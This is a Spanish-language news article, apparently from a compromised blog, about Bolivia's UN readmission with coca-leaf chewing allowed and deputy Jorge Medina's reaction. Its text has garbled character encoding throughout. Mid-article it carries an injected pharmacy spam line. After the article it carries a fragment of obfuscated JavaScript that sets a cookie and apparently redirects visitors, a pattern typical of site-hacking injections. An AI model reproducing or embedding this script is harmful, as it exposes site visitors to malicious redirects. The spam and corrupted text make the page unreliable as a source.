Bolivia vuelve a tener dignidad y soberanA?a con la legalizaciA?n del masticado de hoja de coca

coca_BoliviaEl pueblo boliviano siguiA? festejando la decisiA?n de la OrganizaciA?n de las Naciones Unidas, ONU, de permitir el masticado de la hoja de coca en territorio boliviano. La decisiA?n de la ONU ha significado un reconocimiento a la milenaria tradiciA?n de las comunidades indA?genas.

Los productores cocaleros salieron a festejar a las calles de la ciudad de La Paz, masticando hojas de coca en la boca y regalando hojas de la planta que ellos consideran como sagrada.

El diputado boliviano Jorge Medina, representante de los productores de hoja de coca, seA?alA? que los bolivianos han vuelto a tener dignidad y soberanA?a luego que la ONU legalizA? el masticado de la hoja de coca, actividad conocida como a??acullicoa?? en el paA?s altiplA?nico.

Jorge Medina indicA? que este triunfo internacional es un triunfo de todo el paA?s y del presidente boliviano Evo Morales.

INSERTO

Jorge Medina, representante de los productores de hoja de coca y diputado boliviano, tambiA?n se ratificA? en que la hoja de coca no es cocaA?na ni tampoco es una droga.

ExplicA? que las comunidades indA?genas utilizan la sagrada hoja de coca como medicina tradicional y tambiA?n como alimento porque tiene varias proteA?nas.

buy baclofen online cheap, buy zithromax.

A mediados del 2011, Bolivia se retirA? de la ConvenciA?n de Naciones Unidas sobre EstupefacientesA?debido a que en su artA?culo 49 veta el masticado de hoja de coca.

Sin embargo, meses despuA?s, el presidente boliviano Evo Morales solicitA? la readmisiA?n de Bolivia a la ConvenciA?n, pero con la condiciA?n de que se permita el masticado de hojas de coca en el paA?s.

El pasado viernes 11 de enero la ONU readmitiA? a Bolivia, lo cual ha sido considerado como un A?xito diplomA?tico del gobierno boliviano, a pesar de que paA?ses como Estados Unidos, Gran BretaA?a, Rusia, Francia, Alemania y JapA?n, se opusieron a la posiciA?n andina. (PULSAR)

){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

6 pensamientos en “Bolivia vuelve a tener dignidad y soberanA?a con la legalizaciA?n del masticado de hoja de coca

  1. Pingback: Bolivia vanguardia de lucha anticolonial « Libre Opinión

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

87 − = 83